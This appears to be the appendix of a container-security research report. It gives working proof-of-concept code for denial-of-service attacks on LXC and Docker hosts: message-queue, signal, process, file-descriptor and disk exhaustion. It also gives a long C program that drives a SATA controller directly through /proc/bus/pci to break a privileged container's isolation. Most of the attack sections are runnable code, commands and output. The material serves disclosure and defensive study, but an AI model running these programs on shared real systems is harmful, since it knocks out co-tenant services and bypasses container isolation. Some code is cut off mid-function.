    root@a:/# tcpdump -i any -vv -n dst host 10.0.3.159
    # on the host
    root@vagrant-ubuntu-trusty-64:~# nc 10.0.3.159 8888
    # type something in the above nc session, and observe the connection
    # from the host --> B, sniffing from A:
    root@a:/# tcpdump -i any -vv -n dst host 10.0.3.159
    tcpdump: listening on any, link-type LINUX_SLL (Linux cooked), capture size 65535 bytes
    02:05:05.653355 IP (tos 0x0, ttl 64, id 49639, offset 0, flags [DF], proto TCP (6), length 60)
        10.0.3.1.43655 > 10.0.3.159.8888: Flags [S], cksum 0x1ace (incorrect -> 0x4bff), seq 2684314036, win 29200, options [mss 1460,sackOK,TS val 761939 ecr 0,nop,wscale 6], length 0

Appendix: Denial of Service Proofs-of-Concept Code

All of the following was performed inside default LXC and Docker containers, using a default Vagrant [81] Ubuntu Trusty64 VM [82].
The latest versions of LXC (1.0.8) [58] and Docker (1.10.2) [57] available on Trusty64 at the time of testing were used, and were installed and configured according to their guides [57][58]. (Per the guide, Docker was not using user namespaces or seccomp in this testing.)

POSIX Message Queues

To exhaust all available memory for POSIX message queues, the following C program can be used. It is built with `gcc mq.c -lrt`, and then run with `./a.out`. Run this program in one container until it has used all available resources (at which point it exits with `mq_open(): Too many open files`). Then, inside a second container, run the same program, and observe that it immediately errors out without successfully creating a single message queue.
    /*
     * @author jhertz
     * based off code found at:
     * https://users.pja.edu.pl/~jms/qnx/help/watcom/clibref/mq_overview.html
     */
    #include <stdio.h>
    #include <fcntl.h>
    #include <sys/stat.h>
    #include <mqueue.h>

    void main()
    {
        mqd_t mqdes;        // Message queue descriptors
        unsigned int prio;  // Priority
        char biggest[8192]; // based on a ulimit -q of 819200
        int i;
        const char *ptr = (const char *)biggest;

        for (i = 0; ; i++) {
            sprintf(biggest, "/%d", i);
            printf("going to open mq: %s\n", biggest);
            /* third argument is the permission mode of the new queue */
            mqdes = mq_open(biggest, O_RDWR | O_CREAT, 0600, NULL);
            if (mqdes == -1) {
                perror("mq_open()");
                return;
            }
            for (prio = 0; prio /* [...] */

Pending Signals

[...]

    /* [...] */
    #include <stdio.h>
    #include <signal.h>
    #include <pthread.h>

    int main(void)
    {
        pthread_t thread;
        sigset_t set;
        int s;

        sigfillset(&set); // BLOCK all signals
        printf("going to block all signals\n");
        s = pthread_sigmask(SIG_BLOCK, &set, NULL);
        if (s != 0) {
            printf("couldn't block all signals\n");
            return -1;
        }
        printf("all signals blocked, going to spin loop\n");
        while (1) {
            ;
        }
    }

The above can be built with `gcc signal.c -o signal -lpthread` and then run as `./signal`. Once running, the maximum number of signals can be queued using a simple bash one-liner: `for i in {1..3752}; do kill -64 <pid>; done`, where `<pid>` is the pid of the `signal` program, and 3752 was the maximum number of pending signals allowed by ulimit.
Upon success, the number of signals queued up can be viewed (as any process running as root inside any container) with `cat /proc/self/status | grep SigQ`. This can be verified in a separate container. To see the effects of this, we can observe a call to `timer_create()` failing (due to excessive pending signals) using the timer_create() example from the man pages [83]. Build it with `gcc timer.c -lrt`, and run it with `./a.out 1 1` to observe the timer_create() call failing.
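The SigQ check above can also be done programmatically. Per proc(5), the field holds two slash-separated numbers that relate to the process's real UID: signals currently queued, and the queued-signal resource limit. A minimal sketch with hypothetical helper names, assuming the usual `SigQ:` followed by `queued/limit` line format:

```c
#include <stdio.h>
#include <string.h>

/* Parse a "SigQ:" line from /proc/<pid>/status into the number of signals
 * queued for the real UID and the RLIMIT_SIGPENDING limit.
 * Returns 0 on success, -1 if the line is not a well-formed SigQ line. */
int parse_sigq(const char *line, unsigned long *queued, unsigned long *limit)
{
    if (strncmp(line, "SigQ:", 5) != 0)
        return -1;
    /* %lu skips the tab that follows the field name */
    return sscanf(line + 5, "%lu/%lu", queued, limit) == 2 ? 0 : -1;
}

/* Scan /proc/self/status for the SigQ line; returns 0 on success. */
int read_own_sigq(unsigned long *queued, unsigned long *limit)
{
    char line[256];
    FILE *f = fopen("/proc/self/status", "r");
    int rc = -1;

    if (f == NULL)
        return -1;
    while (fgets(line, sizeof line, f) != NULL) {
        if (parse_sigq(line, queued, limit) == 0) {
            rc = 0;
            break;
        }
    }
    fclose(f);
    return rc;
}
```

Run from a second container while the spinning `signal` program holds its queue full, the first number should sit at the limit if both containers map to the same real UID.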
Max Processes

This is always one of my favorite denial-of-service attacks, because of how simple the "exploit" is versus how large an impact it can have. Even without a trivial fork bomb, a sequential forker of:

    for i in {1..3752}; do sleep infinity & done

in an LXC container was enough to get my Vagrant VM to close all my SSH sessions, and the VM had to be stopped with `vagrant halt --force`. This did not destabilize the host VM on Docker.
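The ceiling a sequential forker runs into is RLIMIT_NPROC, the value `ulimit -u` reports, which getrlimit(2) describes as a limit on the number of processes for the caller's real user ID rather than for a single process tree. A minimal sketch (the helper names are hypothetical) that reads it from inside a container:

```c
#include <stdio.h>
#include <sys/resource.h>

/* Fetch the soft and hard RLIMIT_NPROC values. Returns 0 on success. */
int nproc_limits(rlim_t *soft, rlim_t *hard)
{
    struct rlimit rl;

    if (getrlimit(RLIMIT_NPROC, &rl) != 0)
        return -1;
    *soft = rl.rlim_cur;
    *hard = rl.rlim_max;
    return 0;
}

/* Print a limit, spelling out RLIM_INFINITY instead of a huge number. */
void print_limit(const char *name, rlim_t v)
{
    if (v == RLIM_INFINITY)
        printf("%s: unlimited\n", name);
    else
        printf("%s: %llu\n", name, (unsigned long long)v);
}
```

Comparing the printed soft limit against the 3752 iterations used above gives a rough sense of whether a given container can reach the limit on its own.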
Max Files

To use up all available file descriptors (FDs), the following short C program can be used:

    /*
     * file descriptor eater
     *
     * meant to be used in parallel
     *
     * @author jhertz
     */
    #include <stdio.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/stat.h>

    int main(void)
    {
        int my_pid = getpid();
        char buf[128];
        int i = 0;

        for (i = 0; ; i++) {
            sprintf(buf, "/tmp/%d_%d", my_pid, i);
            /* O_CREAT requires an access mode and a permission argument */
            int fd = open(buf, O_CREAT | O_WRONLY, 0600);
            if (-1 == fd) {
                printf("got to max fd #%d\n", i);
                break;
            }
        }
        printf("stalling\n");
        for (;;)
            ;
    }

It can be compiled with `gcc file.c -o file` and run with `./file`. On Docker, this creates a simple and effective DoS against other Docker containers. On LXC, the ulimits per container were set lower, so in order to exploit this, it needed to be used in parallel:

    for i in {1..100}; do ./file & done

was enough to cause a denial of service to other LXC containers.

Exploiting the global file descriptor limit follows along the same lines as the previous exploit, and is possible even when containers do not share UID maps. Where UID maps are not shared and containers have a max-FD ulimit placed on each of their users, they can attempt to exhaust FDs by running the above code as each user in their user namespace.
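The global limit mentioned above can be watched through /proc/sys/fs/file-nr, which (per proc(5)) holds three numbers: allocated file handles, free file handles, and the system-wide maximum, the same value as /proc/sys/fs/file-max. A minimal sketch with hypothetical helper names, assuming the file is readable from inside the container:

```c
#include <stdio.h>

/* Parse the three whitespace-separated counters from file-nr text.
 * Returns 0 on success, -1 if fewer than three numbers were found. */
int parse_file_nr(const char *text, unsigned long long *allocated,
                  unsigned long long *unused, unsigned long long *max)
{
    return sscanf(text, "%llu %llu %llu", allocated, unused, max) == 3 ? 0 : -1;
}

/* Read the live counters; returns 0 on success. */
int read_file_nr(unsigned long long *allocated, unsigned long long *unused,
                 unsigned long long *max)
{
    char buf[128];
    FILE *f = fopen("/proc/sys/fs/file-nr", "r");
    int rc = -1;

    if (f == NULL)
        return -1;
    if (fgets(buf, sizeof buf, f) != NULL)
        rc = parse_file_nr(buf, allocated, unused, max);
    fclose(f);
    return rc;
}
```

Polling this while several copies of the FD eater run shows the first number climbing toward the third, regardless of which container or user namespace opened the files.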
Disk Space

On LXC, this is as simple as `fallocate -l 18G big_file`, where 18G is big enough to fill up the hard disk. Docker doesn't allow fallocate, so slightly more creativity is needed. dd proved ineffective when trying this attack, and so the following script was written as a PoC:

    #!/usr/bin/env python
    # @author jhertz
    # quick and dirty script to make a big file (~18 gigs)
    # this is far from the most efficient way to do this
    with open("big_file", "w") as f:
        for i in range(1, 1024 * 18):   # range() runs under both Python 2 and 3
            f.write("B" * 1024 * 1024)  # 1 MiB per write
            f.flush()

Appendix: /proc/bus/pci PoC

This proof of concept is meant to demonstrate the ability to circumvent an LXC privileged container's "security boundary" by communicating with the underlying hardware directly.
Environment

The test environment for this PoC was a VMware Workstation [84] VM running Ubuntu Trusty64. The primary disk was a SCSI disk, but a secondary 1GB SATA target disk was added with no special settings (write caching was enabled by default). Communication is possible regardless of the mount state of the drive. A default LXC privileged environment was created using the instructions at [58].
As the root user in the LXC container, `lspci -vv` was used to get information about the target AHCI device:

    02:05.0 SATA controller: VMware Device 07e0 (prog-if 01 [AHCI 1.0])
            Subsystem: VMware Device 07e0
            Physical Slot: 37
            Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+
            Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=fast >TAbort- [...] SERR- [...]
    [...]
    p->ports_impl: 0x3fffffff
    port 0
    command list base address: 0x0
    FIS base address: 0x14c29000
    interrupt status: 0x0
    interrupt enable: 0x7840007f
            PORT_IRQ_D2H_REG_FIS
            PORT_IRQ_PIOS_FIS
            PORT_IRQ_DMAS_FIS
            PORT_IRQ_SDB_FIS
            PORT_IRQ_UNK_FIS
            PORT_IRQ_SG_DONE
            PORT_IRQ_CONNECT
            PORT_IRQ_PHYRDY
            PORT_IRQ_IF_ERR
            PORT_IRQ_HBUS_DATA_ERR
            PORT_IRQ_HBUS_ERR
            PORT_IRQ_TF_ERR
    command and status: 0x44016
            PORT_CMD_SPIN_UP
            PORT_CMD_POWER_ON
            PORT_CMD_FIS_RX
            PORT_CMD_FIS_ON
    signature: 0x101 (SATA drive)
    tfd: 0x441
    status: 0x123
    errors: 0x0
    active: 0x0
    control: 0x320
    interrupt status before: 0x0
    start bit before: 0
    interrupt status after: 0x2
            PORT_IRQ_PIOS_FIS
    Waiting for command completion
    Seems to have completed...
    Got response data in DMA buffer:
    0x7f5a27873000: 7a 42 ab 08 00 00 0f 00  00 00 00 00 3f 00 00 00  zB..............
    0x7f5a27873010: 00 00 00 00 30 30 30 30  30 30 30 30 30 30 30 30  ....000000000000
    0x7f5a27873020: 30 30 30 30 30 30 31 30  00 00 40 00 00 00 30 30  00000010......00
    0x7f5a27873030: 30 30 30 30 31 30 4d 56  61 77 65 72 56 20 72 69  000010MVawerV.ri
    0x7f5a27873040: 75 74 6c 61 53 20 54 41  20 41 61 48 64 72 44 20  utlaS.TA.AaHdrD.
    0x7f5a27873050: 69 72 65 76 20 20 20 20  20 20 20 20 20 20 ff 80  irev............
    0x7f5a27873060: 00 00 00 0f 01 40 00 02  00 00 07 00 ab 08 0f 00  ................
    0x7f5a27873070: 3f 00 3b ff 1f 00 ff 01  00 00 20 00 00 00 07 00  ................
    0x7f5a27873080: 03 00 78 00 78 00 78 00  78 00 00 00 00 00 00 00  ..x.x.x.x.......
    0x7f5a27873090: 00 00 00 00 00 00 1f 00  06 01 00 00 00 00 00 00  ................
    0x7f5a278730a0: 7e 00 18 00 08 40 08 74  00 41 08 40 80 34 00 41  .......t.A...4.A
    [SNIP]

The hexdump output shows the ATA IDENTIFY command response sent back from the controller.
There are some assumptions the code makes. It assumes the drive it is going to talk to is the first device it finds in the AHCI port list that is actually active. It also doesn't cleanly recover everything after getting the response, so the state of the mapped registers is wrong and the kernel won't be able to mount the device afterwards.
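The strings in the IDENTIFY dump above look scrambled because ATA stores them as 16-bit words with the first character in the high byte, so on a little-endian host each character pair appears swapped ("MVawerV"). As a sketch (the helper name is hypothetical), assuming the standard IDENTIFY layout in which the 40-byte model string starts at word 27, i.e. byte offset 0x36 of the buffer, un-swapping the bytes recovers a readable model name:

```c
#include <stddef.h>

/* Un-swap an ATA IDENTIFY string of len bytes from raw into out, trim the
 * trailing space padding, and NUL-terminate. out must hold len + 1 bytes. */
void ata_id_string(const unsigned char *raw, size_t len, char *out)
{
    size_t i;

    /* Each 16-bit word stores its first character in the high byte. */
    for (i = 0; i + 1 < len; i += 2) {
        out[i] = (char)raw[i + 1];
        out[i + 1] = (char)raw[i];
    }
    if (len % 2) /* odd length: copy the last byte unchanged */
        out[len - 1] = (char)raw[len - 1];
    out[len] = '\0';

    /* ATA pads these fields with spaces. */
    while (len > 0 && out[len - 1] == ' ')
        out[--len] = '\0';
}
```

Applied to bytes 0x36 through 0x5d of the dump, this yields "VMware Virtual SATA Hard Drive", which is a quick way to confirm the PoC really talked to the secondary disk.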
Explanation of PoC

While reading the attached code is instructive, here is an overview of the methodology used:

1. Map the control region of the AHCI device into memory through the /proc/bus/pci/ interface using open(), mmap(), and ioctl().
2. Allocate several buffers, and determine their physical addresses using /proc/self/pagemap.
3. Disable interrupts for the device.
4. Find the port the drive is attached to.
5. Set the FIS, Command, and Command List pointers on the device to the previously allocated buffers.
6. Create an H2D FIS (to tell the drive to identify itself), a command to wrap the FIS (telling the drive to use a DMA buffer we have allocated), and a command list structure containing the command.
7. Copy all of these to the previously allocated buffers, which the device also now has pointers to.
8. Flip the start bit on the device to cause it to process commands from the command list.
9. Sleep for a second, then spin loop until the drive has processed the command.
10. The drive has now executed our command (ATA_CMD_ID_ATA, which is the drive identification command), and written the result to a buffer we allocated.
11. Print it out, and attempt (poorly) to restore the drive's state.
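The buffer-allocation step relies on /proc/<pid>/pagemap, which holds one 64-bit entry per virtual page: bit 63 marks the page as present and bits 0-54 carry the page frame number (PFN). A minimal sketch of the arithmetic with hypothetical helper names; note that on Linux 4.2 and later the PFN field reads as zero unless the reader has CAP_SYS_ADMIN, which root in a privileged container does.

```c
#include <stdint.h>

#define PM_PRESENT  (1ULL << 63)        /* bit 63: page present in RAM */
#define PM_PFN_MASK ((1ULL << 55) - 1)  /* bits 0-54: page frame number */

/* Byte offset of the 64-bit entry for vaddr inside /proc/<pid>/pagemap. */
uint64_t pagemap_offset(uint64_t vaddr, uint64_t page_size)
{
    return (vaddr / page_size) * sizeof(uint64_t);
}

/* Combine a pagemap entry with the original virtual address to get the
 * physical address. Returns 0 if the page is not present. */
uint64_t pagemap_entry_to_paddr(uint64_t entry, uint64_t vaddr, uint64_t page_size)
{
    if (!(entry & PM_PRESENT))
        return 0;
    return (entry & PM_PFN_MASK) * page_size + (vaddr % page_size);
}
```

A caller would pread() 8 bytes at `pagemap_offset(vaddr, page_size)` and pass the result in; the PoC additionally memsets and mlock()s each buffer first so the page is resident and stays put while the device DMAs into it.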
The Code

    /*
     * LXC PCI Device Access Through /proc/ PoC
     * Sample code to map in PCI memory for a specified AHCI device and
     * tell the device to identify itself.
     * "vulnerability" discovered by jhertz
     * PoC written by aaron adams
     */
    #define _LARGEFILE64_SOURCE
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <stdlib.h>
    #include <stdint.h>
    #include <string.h>
    #include <errno.h>
    #include <limits.h>
    #include <ctype.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <getopt.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <sys/mman.h>
    #include <sys/ioctl.h>
    #include <linux/pci.h>

    extern char *optarg;
    extern int optind, opterr, optopt;

    #define PAGE_SIZE 4096
    #define PMAP "/proc/%d/pagemap"

    int open_pmap(void)
    {
        int fd;
        int rc;
        char *pmap;

        rc = asprintf(&pmap, PMAP, getpid());
        if (-1 == rc) {
            perror("asprintf");
            exit(EXIT_FAILURE);
        }
        fd = open(pmap, O_RDONLY);
        if (-1 == fd) {
            perror("open");
            exit(EXIT_FAILURE);
        }
        free(pmap);
        return fd;
    }

    #define PM_ENTRY_BYTES sizeof(pagemap_entry_t)
    #define PM_STATUS_BITS 3
    #define PM_STATUS_OFFSET (64 - PM_STATUS_BITS)
    #define PM_STATUS_MASK (((1LL /* [...] */

    /* [...] */ 0; j--) {
            if (i == 0) {
                break;
            }
            if (j == 7) {
                n = sprintf(p, " ");
                p += n;
            }
            c = *(addr - j) & 0xff;
            if (c /* [...] */

    /* [...] */ flags bits */
    #define AHCI_HFLAGS(flags) .private_data = (void *)(flags)
        AHCI_HFLAG_NO_NCQ = (1 /* [...] */

    /* [...] */ flags bits */
        ICH_MAP = 0x90, /* ICH MAP register */

        /* em constants */
        EM_MAX_SLOTS = 8,
        EM_MAX_RETRY = 5,

        /* em_ctl bits */
        EM_CTL_RST = (1 /* [...] */

    /* [...] */\n"
               "  -b Bus ID\n"
               "  -d Device ID\n"
               "  -f Function ID\n"
               "  -a BAR (phys addr)\n"
               "  -p Number of pages to map\n"
               "  -h This usage info\n"
               "Ex: %s -b 02 -d 05 -f 0 -a 0xfd5ee000 -p 1\n", p, p);
    }

    /* This is meant to mimic the output from dmesg | grep AHCI.
     * If there is a match then we know at least we have the right mem location */
    void print_ahci_info(ahci_host_t *p)
    {
        uint32_t speed;
        char *speed_s;

        speed = (p->cap >> 20) & 0xf;
        if (speed == 1)
            speed_s = "1.5";
        else if (speed == 2)
            speed_s = "3";
        else if (speed == 3)
            speed_s = "6";
        else
            speed_s = "";

        printf("AHCI %02x%02x.%02x%02x %u slots %d ports %s Gbps 0x%x impl\n",
               (p->version >> 24) & 0xff, (p->version >> 16) & 0xff,
               (p->version >> 8) & 0xff, (p->version >> 0) & 0xff,
               ((p->cap >> 8) & 0x1f) + 1, (p->cap & 0x1f) + 1,
               speed_s, p->ports_impl);
    }

    // This doesn't actually work in practice...
    void reset_ahci_controller(ahci_host_t *p)
    {
        uint32_t ctl;

        ctl = p->ctl;
        if ((ctl & HOST_RESET) == 0) {
            printf("resetting...\n");
            p->ctl = (ctl | HOST_RESET);
            ctl = p->ctl;
        }
        sleep(2);
        ctl = p->ctl;
        if (ctl & HOST_RESET) {
            printf("Successfully reset!\n");
        } else {
            printf("Didn't reset\n");
        }
    }

    void *ahci_port_base(char *p)
    {
        return p + PORT_OFFSET;
    }

    hba_port_t *ahci_port_entry(char *p, int port_num)
    {
        return (hba_port_t *)((p + PORT_OFFSET) + (port_num * PORT_SIZE));
    }

    void print_interrupt_bits(int ie)
    {
        if (ie & PORT_IRQ_D2H_REG_FIS)  printf("\tPORT_IRQ_D2H_REG_FIS\n");
        if (ie & PORT_IRQ_PIOS_FIS)     printf("\tPORT_IRQ_PIOS_FIS\n");
        if (ie & PORT_IRQ_DMAS_FIS)     printf("\tPORT_IRQ_DMAS_FIS\n");
        if (ie & PORT_IRQ_SDB_FIS)      printf("\tPORT_IRQ_SDB_FIS\n");
        if (ie & PORT_IRQ_UNK_FIS)      printf("\tPORT_IRQ_UNK_FIS\n");
        if (ie & PORT_IRQ_SG_DONE)      printf("\tPORT_IRQ_SG_DONE\n");
        if (ie & PORT_IRQ_CONNECT)      printf("\tPORT_IRQ_CONNECT\n");
        if (ie & PORT_IRQ_DEV_ILCK)     printf("\tPORT_IRQ_DEV_ILCK\n");
        if (ie & PORT_IRQ_PHYRDY)       printf("\tPORT_IRQ_PHYRDY\n");
        if (ie & PORT_IRQ_BAD_PMP)      printf("\tPORT_IRQ_BAD_PMP\n");
        if (ie & PORT_IRQ_OVERFLOW)     printf("\tPORT_IRQ_OVERFLOW\n");
        if (ie & PORT_IRQ_IF_NONFATAL)  printf("\tPORT_IRQ_IF_NONFATAL\n");
        if (ie & PORT_IRQ_IF_ERR)       printf("\tPORT_IRQ_IF_ERR\n");
        if (ie & PORT_IRQ_HBUS_DATA_ERR) printf("\tPORT_IRQ_HBUS_DATA_ERR\n");
        if (ie & PORT_IRQ_HBUS_ERR)     printf("\tPORT_IRQ_HBUS_ERR\n");
        if (ie & PORT_IRQ_TF_ERR)       printf("\tPORT_IRQ_TF_ERR\n");
        if (ie & PORT_IRQ_COLD_PRES)    printf("\tPORT_IRQ_COLD_PRES\n");
    }

    void print_command_bits(int cmd)
    {
        if (cmd & PORT_CMD_START)    printf("\tPORT_CMD_START\n");
        if (cmd & PORT_CMD_SPIN_UP)  printf("\tPORT_CMD_SPIN_UP\n");
        if (cmd & PORT_CMD_POWER_ON) printf("\tPORT_CMD_POWER_ON\n");
        if (cmd & PORT_CMD_CLO)      printf("\tPORT_CMD_CLO\n");
        if (cmd & PORT_CMD_FIS_RX)   printf("\tPORT_CMD_FIS_RX\n");
        if (cmd & PORT_CMD_FIS_ON)   printf("\tPORT_CMD_FIS_ON\n");
        if (cmd & PORT_CMD_LIST_ON)  printf("\tPORT_CMD_LIST_ON\n");
        if (cmd & PORT_CMD_PMP)      printf("\tPORT_CMD_PMP\n");
        if (cmd & PORT_CMD_FBSCP)    printf("\tPORT_CMD_FBSCP\n");
        if (cmd & PORT_CMD_ATAPI)    printf("\tPORT_CMD_ATAPI\n");
        if (cmd & PORT_CMD_ALPE)     printf("\tPORT_CMD_ALPE\n");
        if (cmd & PORT_CMD_ASP)      printf("\tPORT_CMD_ASP\n");
    }

    void print_ahci_port(hba_port_t *p)
    {
        printf("command list base address: 0x%x\n", p->clb);
        printf("FIS base address: 0x%x\n", p->fb);
        printf("interrupt status: 0x%x\n", p->is);
        print_interrupt_bits(p->is);
        printf("interrupt enable: 0x%x\n", p->ie);
        print_interrupt_bits(p->ie);
        printf("command and status: 0x%x\n", p->cmd);
        print_command_bits(p->cmd);
        printf("signature: 0x%x", p->sig);
        if (p->sig == SATA_SIG_ATA) {
            printf(" (SATA drive)\n");
        } else {
            putchar('\n');
        }
        printf("tfd: 0x%x\n", p->tfd);
        printf("status: 0x%x\n", p->ssts);
        printf("errors: 0x%x\n", p->serr);
        printf("active: 0x%x\n", p->sact);
        printf("control: 0x%x\n", p->sctl);
    }

    void start_cmd(hba_port_t *p)
    {
        printf("Waiting for PORT_CMD_START\n");
        while (p->cmd & PORT_CMD_START)
            ;
        printf("PORT_CMD_START is off\n");
        p->cmd |= PORT_CMD_FIS_RX;
        p->cmd |= PORT_CMD_START;
        printf("Started cmd engine\n");
    }

    void stop_cmd(hba_port_t *p)
    {
        int cmd;

        printf("Before:\n");
        print_command_bits(p->cmd);
        p->cmd &= ~PORT_CMD_START;
        cmd = p->cmd; // flush
        printf("Waiting for PORT_CMD_FIS_ON and PORT_CMD_LIST_ON\n");
        // These never seem to actually shut off when you unset the CMD_START bit
        // despite what the osdev wiki says, not sure what is wrong
        while (0) { // XXX while (1)
            if (p->cmd & PORT_CMD_FIS_ON)
                continue;
            if (p->cmd & PORT_CMD_LIST_ON)
                continue;
            break;
        }
        p->cmd &= ~PORT_CMD_FIS_RX;
        cmd = p->cmd; // flush
        printf("Stopped cmd engine\n");
        printf("After:\n");
        print_command_bits(p->cmd);
    }

    /* XXX - This should use the ports_impl member to actually find the first one instead */
    int32_t find_inuse_port(ahci_host_t *p)
    {
        int32_t port;
        int32_t port_count;
        hba_port_t *hbap;

        port_count = (p->cap & 0x1f) + 1;
        printf("p->ports_impl: 0x%x\n", p->ports_impl);
        for (port = 0; port /* [...] */ie != 0) {
                printf("port %d\n", port);
                print_ahci_port(hbap);
                printf("\n");
                return port;
            }
        }
        return -1;
    }

    /* For larger data transfers we would have issues here with forcing adjacent
     * physical pages needed for dma. If you do one 512 sector at a time it might
     * be okay though */
    char *alloc_phy(uint32_t len, uint64_t *phy)
    {
        char *vaddr;
        static int32_t pmap = 0;

        if (len > PAGE_SIZE) {
            printf("[!] Warning. Physical allocation of size 0x%x might not be contiguous\n", len);
        }
        vaddr = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if ((int64_t)vaddr == -1) {
            perror("mmap");
            exit(EXIT_FAILURE);
        }
        // Touch it to be sure it's actually mapped
        memset(vaddr, 0, len);
        // Lock it to ensure it doesn't get swapped during dma or something
        mlock(vaddr, len);
        if (!pmap) {
            pmap = open_pmap();
        }
        *phy = vaddr_to_paddr(pmap, (uint64_t)vaddr);
        return vaddr;
    }

    void disable_interrupts(ahci_host_t *p)
    {
        uint32_t ctl;

        ctl = p->ctl & ~HOST_IRQ_EN; /* read-modify-write: keep the other GHC bits intact */
        p->ctl = ctl;
        ctl = p->ctl; // flush
        if (ctl & HOST_IRQ_EN) {
            printf("IRQs did not disable! Something is broken\n");
            exit(EXIT_FAILURE);
        } else {
            printf("IRQs disabled\n");
        }
    }

    void enable_interrupts(ahci_host_t *p)
    {
        uint32_t ctl;

        ctl = p->ctl | HOST_IRQ_EN;
        p->ctl = ctl;
        ctl = p->ctl; // flush
        if (ctl & HOST_IRQ_EN) {
            printf("IRQs enabled\n");
        } else {
            printf("IRQs couldn't be enabled! Something is broken\n");
            exit(EXIT_FAILURE);
        }
    }

    int32_t main(int32_t argc, char **argv)
    {
        uint32_t c;
        char path[PATH_MAX];
        int32_t fd;
        char *bus;
        char *device;
        char *function;
        uint32_t sbus, sdevfn, svend;
        unsigned long bar, sbar = 0;
        uint32_t total_read_size;
        ahci_host_t *p;
        char *ptr;
        char *dma;          // data sent and received via scatter/gather
        uint64_t dma_phy;
        char *cmd_list;     // new address of command list
        uint64_t cmd_list_phy;
        char *cmd;          // address of command table
        uint64_t cmd_phy;
        char *fis_buf;      // address to receive FIS responses
        uint64_t fis_buf_phy;
        unsigned int num_pages;
        uint32_t orig_cmd_list;
        uint32_t orig_cmd_listu;
        uint32_t orig_fis;
        uint32_t orig_fisu;
        struct host_to_dev_fis fis;
        struct dma_setup_fis setup_fis;
        struct cmd_hdr *cmd_hdr;
        struct cmd_sg *cmd_sg;
        int32_t fis_len;
        int32_t buf_len;
        int32_t tmp;
        int32_t i;
        int32_t complete;
        int32_t done;
        char last_fis_page[PAGE_SIZE];
        char last_cmd_page[PAGE_SIZE];

        bus = device = function = NULL;
        num_pages = bar = sbus = sdevfn = 0;

        while ((c = getopt(argc, argv, "b:d:f:a:p:h")) != -1) {
            switch (c) {
            case 'b':
                bus = optarg;
                break;
            case 'd':
                device = optarg;
                break;
            case 'f':
                function = optarg;
                break;
            case 'a':
                bar = strtoul(optarg, NULL, 16);
                break;
            case 'p':
                num_pages = atoi(optarg);
                break;
            case 'h':
            default:
                usage(argv[0]);
                exit(EXIT_SUCCESS);
            }
        }

        if (!bus || !device || !function || !num_pages || !bar) {
            printf("Must supply bus slot function bar (hex) num_pages (dec)\n");
            usage(argv[0]);
            exit(EXIT_FAILURE);
        }

        total_read_size = getpagesize() * num_pages;
        printf("bar: %lx bus: %s device: %s function: %s\n", bar, bus, device, function);
        sprintf(path, "/proc/bus/pci/%s/%s.%s", bus, device, function);
        fd = open(path, O_RDWR);
        if (fd == -1) {
            printf("Failed to open: %s\n", path);
            perror("open");
            exit(1);
        }
        printf("opened %s\n", path);
        printf("mapping %d pages of size: %d\n", num_pages, getpagesize());
        ioctl(fd, PCIIOC_MMAP_IS_MEM);
        ptr = mmap(NULL, total_read_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, (off_t)bar);
        if (ptr == MAP_FAILED) {
            perror("mmap failed!");
            exit(1);
        }

        print_ahci_info((ahci_host_t *)ptr);
        p = (ahci_host_t *)ptr;

        // Disable interrupts for this device so the kernel doesn't get involved.
        // This obviously breaks if it's the main disk, since it will stop
        // working...
        disable_interrupts(p);

        if (p->cap & HOST_CAP_64) {
            printf("Supports 64-bit addresses\n");
        }
        /* This means the FIS DMA setup functionality is hidden by the AHCI
         * controller itself, and it will copy to our buffers, specified via SG in
         * other FIS directly */
        if (p->cap & HOST_CAP_NCQ) {
            printf("Supports native command queuing\n");
        }
        // This would influence our CFIS construction later
        if (p->cap & HOST_CAP_PMP) {
            printf("Supports port multiplier\n");
        }

        // should stay below 1 page to ensure memory contiguity
        dma = alloc_phy(PAGE_SIZE, &dma_phy);
        cmd_list = alloc_phy(PAGE_SIZE, &cmd_list_phy);
        fis_buf = alloc_phy(PAGE_SIZE, &fis_buf_phy);
        cmd = alloc_phy(PAGE_SIZE, &cmd_phy);
        printf("DMA buffer @ 0x%lx\n", (uint64_t)dma_phy);
        printf("cmd list buffer @ 0x%lx\n", (uint64_t)cmd_list_phy);
        printf("FIS buffer @ 0x%lx\n", (uint64_t)fis_buf_phy);
        printf("cmd buffer @ 0x%lx\n", (uint64_t)cmd_phy);
        memcpy(last_fis_page, fis_buf, PAGE_SIZE);

        int32_t tport = find_inuse_port(p);
        hba_port_t *hbap;
        hbap = ahci_port_entry((char *)p, tport);

        // if you want to just crash a machine you can zero out everything
        // memset(hbap, 0, sizeof(hba_port_t));

        orig_fis = hbap->fb;
        orig_fisu = hbap->fbu;
        orig_cmd_list = hbap->clb;
        orig_cmd_listu = hbap->clbu;

        // XXX - stopping like this doesn't seem to actually work
        // stop_cmd(hbap);
        hbap->fb = (uint64_t)fis_buf_phy & 0xfffffffff;
        hbap->fbu = 0;
        hbap->clb = (uint64_t)cmd_list_phy & 0xfffffffff;
        hbap->clbu = 0;
        // start_cmd(hbap);

        memset(&fis, 0, sizeof(fis));
        memset(&setup_fis, 0, sizeof(setup_fis));

        // build H2D fis
        fis.type = FIS_TYPE_REG_H2D;
        fis.opts = 1 /* [...] */>8) & 0xff;
        fis.lba_mid = (dma_phy >> 16) & 0xff;
        fis.lba_hi = (dma_phy >> 24) & 0xff;
        fis.sect_count = 1;

        fis_len = 5;
        buf_len = sizeof(uint16_t) * ATA_ID_WORDS;
        memcpy(cmd, &fis, fis_len * 4);

        cmd_hdr = (struct cmd_hdr *)cmd_list;
        cmd_hdr->ctba = (cmd_phy & 0xffffffff);
        cmd_hdr->ctbau = ((cmd_phy >> 16) >> 16);

        // These assume we are using the first slot
        cmd_sg = (struct cmd_sg *)(cmd + AHCI_CMD_TBL_HDR_SZ);
        cmd_sg->info = (buf_len - 1) & 0x3fffff;
        cmd_sg->dba = dma_phy & 0xFFFFFFFF;
        cmd_sg->dba_upper = ((dma_phy >> 16) >> 16);

        // 1 /* [...] */
        /* [...] */opts |= fis_len | (1 /* [...] */
        /* [...] */is);
        printf("start bit before: %d\n", hbap->cmd & 1);
